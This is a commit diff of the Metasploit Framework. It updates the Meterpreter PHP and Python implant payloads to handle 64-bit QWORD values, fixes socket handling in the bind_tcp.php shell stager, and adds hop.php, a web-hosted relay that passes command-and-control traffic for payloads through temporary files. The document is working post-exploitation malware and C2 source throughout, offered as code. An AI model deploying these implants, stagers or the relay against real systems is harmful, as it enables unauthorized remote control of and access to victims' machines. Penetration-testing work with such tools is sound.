sempervictus
diff --git a/‎Gemfile
Lines changed: 1 addition & 1 deletion b/‎Gemfile
Lines changed: 1 addition & 1 deletion
diff --git a/‎Gemfile.lock
Lines changed: 1 addition & 1 deletion b/‎Gemfile.lock
Lines changed: 1 addition & 1 deletion
diff --git a/‎data/meterpreter/ext_server_stdapi.php
Lines changed: 11 additions & 11 deletions b/‎data/meterpreter/ext_server_stdapi.php
Lines changed: 11 additions & 11 deletions
diff --git a/‎data/meterpreter/ext_server_stdapi.py
Lines changed: 12 additions & 11 deletions b/‎data/meterpreter/ext_server_stdapi.py
Lines changed: 12 additions & 11 deletions
diff --git a/‎data/meterpreter/meterpreter.php
Lines changed: 17 additions & 2 deletions b/‎data/meterpreter/meterpreter.php
Lines changed: 17 additions & 2 deletions
diff --git a/‎data/meterpreter/meterpreter.py
Lines changed: 5 additions & 0 deletions b/‎data/meterpreter/meterpreter.py
Lines changed: 5 additions & 0 deletions
diff --git a/‎data/php/bind_tcp.php
Lines changed: 5 additions & 2 deletions b/‎data/php/bind_tcp.php
Lines changed: 5 additions & 2 deletions
diff --git a/‎data/php/hop.php
Lines changed: 68 additions & 0 deletions b/‎data/php/hop.php
Lines changed: 68 additions & 0 deletions
@@ -25,7 +25,7 @@ group :db do
   # Needed for Msf::DbManager
   gem 'activerecord', '>= 3.0.0', '< 4.0.0'
   # Database models shared between framework and Pro.
-  gem 'metasploit_data_models', '~> 0.17.0'
+  gem 'metasploit_data_models', '0.17.0'
   # Needed for module caching in Mdm::ModuleDetails
   gem 'pg', '>= 0.11'
 end
 
@@ -70,7 +70,7 @@ DEPENDENCIES
   factory_girl (>= 4.1.0)
   fivemat (= 1.2.1)
   json
-  metasploit_data_models (~> 0.17.0)
+  metasploit_data_models (= 0.17.0)
   meterpreter_bins (= 0.0.6)
   msgpack
   network_interface (~> 0.0.1)
 
@@ -6,10 +6,10 @@
 ##
 # General
 ##
-define("TLV_TYPE_HANDLE",              TLV_META_TYPE_UINT    |  600);
+define("TLV_TYPE_HANDLE",              TLV_META_TYPE_QWORD   |  600);
 define("TLV_TYPE_INHERIT",             TLV_META_TYPE_BOOL    |  601);
-define("TLV_TYPE_PROCESS_HANDLE",      TLV_META_TYPE_UINT    |  630);
-define("TLV_TYPE_THREAD_HANDLE",       TLV_META_TYPE_UINT    |  631);
+define("TLV_TYPE_PROCESS_HANDLE",      TLV_META_TYPE_QWORD   |  630);
+define("TLV_TYPE_THREAD_HANDLE",       TLV_META_TYPE_QWORD   |  631);
 
 ##
 # Fs
@@ -65,7 +65,7 @@
 define("PROCESS_EXECUTE_FLAG_USE_THREAD_TOKEN", (1 << 3));
 
 # Registry
-define("TLV_TYPE_HKEY",                TLV_META_TYPE_UINT    | 1000);
+define("TLV_TYPE_HKEY",                TLV_META_TYPE_QWORD   | 1000);
 define("TLV_TYPE_ROOT_KEY",            TLV_TYPE_HKEY);
 define("TLV_TYPE_BASE_KEY",            TLV_META_TYPE_STRING  | 1001);
 define("TLV_TYPE_PERMISSION",          TLV_META_TYPE_UINT    | 1002);
@@ -90,12 +90,12 @@
 define("DELETE_KEY_FLAG_RECURSIVE", (1 << 0));
 
 # Process
-define("TLV_TYPE_BASE_ADDRESS",        TLV_META_TYPE_UINT    | 2000);
+define("TLV_TYPE_BASE_ADDRESS",        TLV_META_TYPE_QWORD   | 2000);
 define("TLV_TYPE_ALLOCATION_TYPE",     TLV_META_TYPE_UINT    | 2001);
 define("TLV_TYPE_PROTECTION",          TLV_META_TYPE_UINT    | 2002);
 define("TLV_TYPE_PROCESS_PERMS",       TLV_META_TYPE_UINT    | 2003);
 define("TLV_TYPE_PROCESS_MEMORY",      TLV_META_TYPE_RAW     | 2004);
-define("TLV_TYPE_ALLOC_BASE_ADDRESS",  TLV_META_TYPE_UINT    | 2005);
+define("TLV_TYPE_ALLOC_BASE_ADDRESS",  TLV_META_TYPE_QWORD   | 2005);
 define("TLV_TYPE_MEMORY_STATE",        TLV_META_TYPE_UINT    | 2006);
 define("TLV_TYPE_MEMORY_TYPE",         TLV_META_TYPE_UINT    | 2007);
 define("TLV_TYPE_ALLOC_PROTECTION",    TLV_META_TYPE_UINT    | 2008);
@@ -109,16 +109,16 @@
 define("TLV_TYPE_IMAGE_FILE",          TLV_META_TYPE_STRING  | 2400);
 define("TLV_TYPE_IMAGE_FILE_PATH",     TLV_META_TYPE_STRING  | 2401);
 define("TLV_TYPE_PROCEDURE_NAME",      TLV_META_TYPE_STRING  | 2402);
-define("TLV_TYPE_PROCEDURE_ADDRESS",   TLV_META_TYPE_UINT    | 2403);
-define("TLV_TYPE_IMAGE_BASE",          TLV_META_TYPE_UINT    | 2404);
+define("TLV_TYPE_PROCEDURE_ADDRESS",   TLV_META_TYPE_QWORD   | 2403);
+define("TLV_TYPE_IMAGE_BASE",          TLV_META_TYPE_QWORD   | 2404);
 define("TLV_TYPE_IMAGE_GROUP",         TLV_META_TYPE_GROUP   | 2405);
 define("TLV_TYPE_IMAGE_NAME",          TLV_META_TYPE_STRING  | 2406);
 
 define("TLV_TYPE_THREAD_ID",           TLV_META_TYPE_UINT    | 2500);
 define("TLV_TYPE_THREAD_PERMS",        TLV_META_TYPE_UINT    | 2502);
 define("TLV_TYPE_EXIT_CODE",           TLV_META_TYPE_UINT    | 2510);
-define("TLV_TYPE_ENTRY_POINT",         TLV_META_TYPE_UINT    | 2511);
-define("TLV_TYPE_ENTRY_PARAMETER",     TLV_META_TYPE_UINT    | 2512);
+define("TLV_TYPE_ENTRY_POINT",         TLV_META_TYPE_QWORD   | 2511);
+define("TLV_TYPE_ENTRY_PARAMETER",     TLV_META_TYPE_QWORD   | 2512);
 define("TLV_TYPE_CREATION_FLAGS",      TLV_META_TYPE_UINT    | 2513);
 
 define("TLV_TYPE_REGISTER_NAME",       TLV_META_TYPE_STRING  | 2540);
@@ -137,7 +137,7 @@
 # Event Log
 ##
 define("TLV_TYPE_EVENT_SOURCENAME",    TLV_META_TYPE_STRING  | 4000);
-define("TLV_TYPE_EVENT_HANDLE",        TLV_META_TYPE_UINT    | 4001);
+define("TLV_TYPE_EVENT_HANDLE",        TLV_META_TYPE_QWORD   | 4001);
 define("TLV_TYPE_EVENT_NUMRECORDS",    TLV_META_TYPE_UINT    | 4002);
 
 define("TLV_TYPE_EVENT_READFLAGS",     TLV_META_TYPE_UINT    | 4003);
 
@@ -252,6 +252,7 @@ class RTATTR(ctypes.Structure):
 TLV_META_TYPE_UINT       = (1 << 17)
 TLV_META_TYPE_RAW        = (1 << 18)
 TLV_META_TYPE_BOOL       = (1 << 19)
+TLV_META_TYPE_QWORD      = (1 << 20)
 TLV_META_TYPE_COMPRESSED = (1 << 29)
 TLV_META_TYPE_GROUP      = (1 << 30)
 TLV_META_TYPE_COMPLEX    = (1 << 31)
@@ -284,10 +285,10 @@ class RTATTR(ctypes.Structure):
 ##
 # General
 ##
-TLV_TYPE_HANDLE                = TLV_META_TYPE_UINT    | 600
+TLV_TYPE_HANDLE                = TLV_META_TYPE_QWORD   | 600
 TLV_TYPE_INHERIT               = TLV_META_TYPE_BOOL    | 601
-TLV_TYPE_PROCESS_HANDLE        = TLV_META_TYPE_UINT    | 630
-TLV_TYPE_THREAD_HANDLE         = TLV_META_TYPE_UINT    | 631
+TLV_TYPE_PROCESS_HANDLE        = TLV_META_TYPE_QWORD   | 630
+TLV_TYPE_THREAD_HANDLE         = TLV_META_TYPE_QWORD   | 631
 
 ##
 # Fs
@@ -346,7 +347,7 @@ class RTATTR(ctypes.Structure):
 ##
 # Registry
 ##
-TLV_TYPE_HKEY                  = TLV_META_TYPE_UINT    | 1000
+TLV_TYPE_HKEY                  = TLV_META_TYPE_QWORD   | 1000
 TLV_TYPE_ROOT_KEY              = TLV_TYPE_HKEY
 TLV_TYPE_BASE_KEY              = TLV_META_TYPE_STRING  | 1001
 TLV_TYPE_PERMISSION            = TLV_META_TYPE_UINT    | 1002
@@ -376,12 +377,12 @@ class RTATTR(ctypes.Structure):
 ##
 # Process
 ##
-TLV_TYPE_BASE_ADDRESS          = TLV_META_TYPE_UINT    | 2000
+TLV_TYPE_BASE_ADDRESS          = TLV_META_TYPE_QWORD   | 2000
 TLV_TYPE_ALLOCATION_TYPE       = TLV_META_TYPE_UINT    | 2001
 TLV_TYPE_PROTECTION            = TLV_META_TYPE_UINT    | 2002
 TLV_TYPE_PROCESS_PERMS         = TLV_META_TYPE_UINT    | 2003
 TLV_TYPE_PROCESS_MEMORY        = TLV_META_TYPE_RAW     | 2004
-TLV_TYPE_ALLOC_BASE_ADDRESS    = TLV_META_TYPE_UINT    | 2005
+TLV_TYPE_ALLOC_BASE_ADDRESS    = TLV_META_TYPE_QWORD   | 2005
 TLV_TYPE_MEMORY_STATE          = TLV_META_TYPE_UINT    | 2006
 TLV_TYPE_MEMORY_TYPE           = TLV_META_TYPE_UINT    | 2007
 TLV_TYPE_ALLOC_PROTECTION      = TLV_META_TYPE_UINT    | 2008
@@ -397,16 +398,16 @@ class RTATTR(ctypes.Structure):
 TLV_TYPE_IMAGE_FILE            = TLV_META_TYPE_STRING  | 2400
 TLV_TYPE_IMAGE_FILE_PATH       = TLV_META_TYPE_STRING  | 2401
 TLV_TYPE_PROCEDURE_NAME        = TLV_META_TYPE_STRING  | 2402
-TLV_TYPE_PROCEDURE_ADDRESS     = TLV_META_TYPE_UINT    | 2403
-TLV_TYPE_IMAGE_BASE            = TLV_META_TYPE_UINT    | 2404
+TLV_TYPE_PROCEDURE_ADDRESS     = TLV_META_TYPE_QWORD   | 2403
+TLV_TYPE_IMAGE_BASE            = TLV_META_TYPE_QWORD   | 2404
 TLV_TYPE_IMAGE_GROUP           = TLV_META_TYPE_GROUP   | 2405
 TLV_TYPE_IMAGE_NAME            = TLV_META_TYPE_STRING  | 2406
 
 TLV_TYPE_THREAD_ID             = TLV_META_TYPE_UINT    | 2500
 TLV_TYPE_THREAD_PERMS          = TLV_META_TYPE_UINT    | 2502
 TLV_TYPE_EXIT_CODE             = TLV_META_TYPE_UINT    | 2510
-TLV_TYPE_ENTRY_POINT           = TLV_META_TYPE_UINT    | 2511
-TLV_TYPE_ENTRY_PARAMETER       = TLV_META_TYPE_UINT    | 2512
+TLV_TYPE_ENTRY_POINT           = TLV_META_TYPE_QWORD   | 2511
+TLV_TYPE_ENTRY_PARAMETER       = TLV_META_TYPE_QWORD   | 2512
 TLV_TYPE_CREATION_FLAGS        = TLV_META_TYPE_UINT    | 2513
 
 TLV_TYPE_REGISTER_NAME         = TLV_META_TYPE_STRING  | 2540
@@ -425,7 +426,7 @@ class RTATTR(ctypes.Structure):
 # Event Log
 ##
 TLV_TYPE_EVENT_SOURCENAME      = TLV_META_TYPE_STRING  | 4000
-TLV_TYPE_EVENT_HANDLE          = TLV_META_TYPE_UINT    | 4001
+TLV_TYPE_EVENT_HANDLE          = TLV_META_TYPE_QWORD   | 4001
 TLV_TYPE_EVENT_NUMRECORDS      = TLV_META_TYPE_UINT    | 4002
 
 TLV_TYPE_EVENT_READFLAGS       = TLV_META_TYPE_UINT    | 4003
 
@@ -125,6 +125,7 @@ function socket_set_option($sock, $type, $opt, $value) {
 define("TLV_META_TYPE_UINT",       (1 << 17));
 define("TLV_META_TYPE_RAW",        (1 << 18));
 define("TLV_META_TYPE_BOOL",       (1 << 19));
+define("TLV_META_TYPE_QWORD",      (1 << 20));
 define("TLV_META_TYPE_COMPRESSED", (1 << 29));
 define("TLV_META_TYPE_GROUP",      (1 << 30));
 define("TLV_META_TYPE_COMPLEX",    (1 << 31));
@@ -655,6 +656,11 @@ function tlv_pack($tlv) {
     if (($tlv['type'] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING) {
         $ret = pack("NNa*", 8 + strlen($tlv['value'])+1, $tlv['type'], $tlv['value'] . "\0");
     }
+    elseif (($tlv['type'] & TLV_META_TYPE_QWORD) == TLV_META_TYPE_QWORD) {
+        $hi = ($tlv['value'] >> 32) & 0xFFFFFFFF;
+        $lo = $tlv['value'] & 0xFFFFFFFF;
+        $ret = pack("NNNN", 8 + 8, $tlv['type'], $hi, $lo);
+    }
     elseif (($tlv['type'] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT) {
         $ret = pack("NNN", 8 + 4, $tlv['type'], $tlv['value']);
     }
@@ -686,10 +692,17 @@ function tlv_unpack($raw_tlv) {
     my_print("len: {$tlv['len']}, type: {$tlv['type']}");
     if (($type & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING) {
         $tlv = unpack("Nlen/Ntype/a*value", substr($raw_tlv, 0, $tlv['len']));
+        # PHP 5.5.0 modifed the 'a' unpack format to stop removing the trailing
+        # NULL, so catch that here
+        $tlv['value'] = str_replace("\0", "", $tlv['value']);
     }
     elseif (($type & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT) {
         $tlv = unpack("Nlen/Ntype/Nvalue", substr($raw_tlv, 0, $tlv['len']));
     }
+    elseif (($type & TLV_META_TYPE_QWORD) == TLV_META_TYPE_QWORD) {
+        $tlv = unpack("Nlen/Ntype/Nhi/Nlo", substr($raw_tlv, 0, $tlv['len']));
+        $tlv['value'] = $tlv['hi'] << 32 | $tlv['lo'];
+    }
     elseif (($type & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL) {
         $tlv = unpack("Nlen/Ntype/cvalue", substr($raw_tlv, 0, $tlv['len']));
     }
@@ -911,7 +924,8 @@ function read($resource, $len=null) {
         $r = Array($resource);
         my_print("Calling select to see if there's data on $resource");
         while (true) {
-            $cnt = stream_select($r, $w=NULL, $e=NULL, 0);
+            $w=NULL;$e=NULL;$t=0;
+            $cnt = stream_select($r, $w, $e, $t);
 
             # Stream is not ready to read, have to live with what we've gotten
             # so far
@@ -1147,7 +1161,8 @@ function remove_reader($resource) {
 # Main dispatch loop
 #
 $r=$GLOBALS['readers'];
-while (false !== ($cnt = select($r, $w=null, $e=null, 1))) {
+$w=NULL;$e=NULL;$t=1;
+while (false !== ($cnt = select($r, $w, $e, $t))) {
     #my_print(sprintf("Returned from select with %s readers", count($r)));
     $read_failed = false;
     for ($i = 0; $i < $cnt; $i++) {
 
@@ -54,6 +54,7 @@
 TLV_META_TYPE_UINT       = (1 << 17)
 TLV_META_TYPE_RAW        = (1 << 18)
 TLV_META_TYPE_BOOL       = (1 << 19)
+TLV_META_TYPE_QWORD      = (1 << 20)
 TLV_META_TYPE_COMPRESSED = (1 << 29)
 TLV_META_TYPE_GROUP      = (1 << 30)
 TLV_META_TYPE_COMPLEX    = (1 << 31)
@@ -150,6 +151,8 @@ def packet_enum_tlvs(pkt, tlv_type = None):
 				val = str(val.split(NULL_BYTE, 1)[0])
 			elif (tlv[1] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
 				val = struct.unpack('>I', val)[0]
+			elif (tlv[1] & TLV_META_TYPE_QWORD) == TLV_META_TYPE_QWORD:
+				val = struct.unpack('>Q', val)[0]
 			elif (tlv[1] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
 				val = bool(struct.unpack('b', val)[0])
 			elif (tlv[1] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
@@ -175,6 +178,8 @@ def tlv_pack(*args):
 	data = ""
 	if (tlv['type'] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
 		data = struct.pack('>III', 12, tlv['type'], tlv['value'])
+	elif (tlv['type'] & TLV_META_TYPE_QWORD) == TLV_META_TYPE_QWORD:
+		data = struct.pack('>IIQ', 16, tlv['type'], tlv['value'])
 	elif (tlv['type'] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
 		data = struct.pack('>II', 9, tlv['type']) + bytes(chr(int(bool(tlv['value']))), 'UTF-8')
 	else:
 
@@ -9,24 +9,27 @@
 	$srvsock = stream_socket_server("tcp://{$ipaddr}:{$port}");
 	if (!$srvsock) { die(); }
 	$s = stream_socket_accept($srvsock, -1);
+	fclose($srvsock);
 	$s_type = 'stream';
 } elseif (is_callable('socket_create_listen')) {
 	$srvsock = socket_create_listen(AF_INET, SOCK_STREAM, SOL_TCP);
 	if (!$res) { die(); }
 	$s = socket_accept($srvsock);
+	socket_close($srvsock);
 	$s_type = 'socket';
 } elseif (is_callable('socket_create')) {
 	$srvsock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
 	$res = socket_bind($srvsock, $ipaddr, $port);
 	if (!$res) { die(); }
 	$s = socket_accept($srvsock);
+	socket_close($srvsock);
 	$s_type = 'socket';
 } else {
 	die();
 }
 if (!$s) { die(); }
 
-switch ($s_type) { 
+switch ($s_type) {
 case 'stream': $len = fread($s, 4); break;
 case 'socket': $len = socket_read($s, 4); break;
 }
@@ -40,7 +43,7 @@
 
 $b = '';
 while (strlen($b) < $len) {
-	switch ($s_type) { 
+	switch ($s_type) {
 	case 'stream': $b .= fread($s, $len-strlen($b)); break;
 	case 'socket': $b .= socket_read($s, $len-strlen($b)); break;
 	}
 
@@ -0,0 +1,68 @@
+<?php
+$magic = 'TzGq';
+$tempdir = sys_get_temp_dir() . "/hop" . $magic;
+if(!is_dir($tempdir)){
+	mkdir($tempdir); //make sure it's there
+}
+
+//get url
+$url = $_SERVER["QUERY_STRING"];
+//like /path/hop.php?/uRIcksm_lOnGidENTifIEr
+
+//Looks for a file with a name or contents prefix, if found, send it and deletes it
+function findSendDelete($tempdir, $prefix, $one=true){
+	if($dh = opendir($tempdir)){
+		while(($file = readdir($dh)) !== false){
+			if(strpos($file, $prefix) !== 0){
+				continue;
+			}
+			readfile($tempdir."/".$file);
+			unlink($tempdir."/".$file);
+			if($one){
+				break;
+			}
+		}
+	}
+}
+
+//handle control
+if($url === "/control"){
+	if($_SERVER['REQUEST_METHOD'] === 'POST'){
+		//handle data for payload - save in a "down" file or the "init" file
+		$postdata = file_get_contents("php://input");
+		if(array_key_exists('HTTP_X_INIT', $_SERVER)){
+			$f = fopen($tempdir."/init", "w"); //only one init file
+		}else{
+			$prefix = "down_" . bin2hex($_SERVER['HTTP_X_URLFRAG']);
+			$f = fopen(tempnam($tempdir,$prefix), "w");
+		}
+		fwrite($f, $postdata);
+		fclose($f);
+	}else{
+		findSendDelete($tempdir, "up_", false);
+	}
+}else if($_SERVER['REQUEST_METHOD'] === 'POST'){
+	//get data
+	$postdata = file_get_contents("php://input");
+	//See if we should send anything down
+	if($postdata === 'RECV'){
+		findSendDelete($tempdir, "down_" . bin2hex($url));
+		$fname = $tempdir . "/up_recv_" . bin2hex($url); //Only keep one RECV poll
+	}else{
+		$fname = tempnam($tempdir, "up_"); //actual data gets its own filename
+	}
+	//find free and write new file
+	$f = fopen($fname, "w");
+	fwrite($f, $magic);
+	//Little-endian pack length and data
+	$urlen = strlen($url);
+	fwrite($f, pack('V', $urlen));
+	fwrite($f, $url);
+	$postdatalen = strlen($postdata);
+	fwrite($f, pack('V', $postdatalen));
+	fwrite($f, $postdata);
+	fclose($f);
+//Initial query will be a GET and have a 12345 in it
+}else if(strpos($url, "12345") !== FALSE){
+	readfile($tempdir."/init");
+}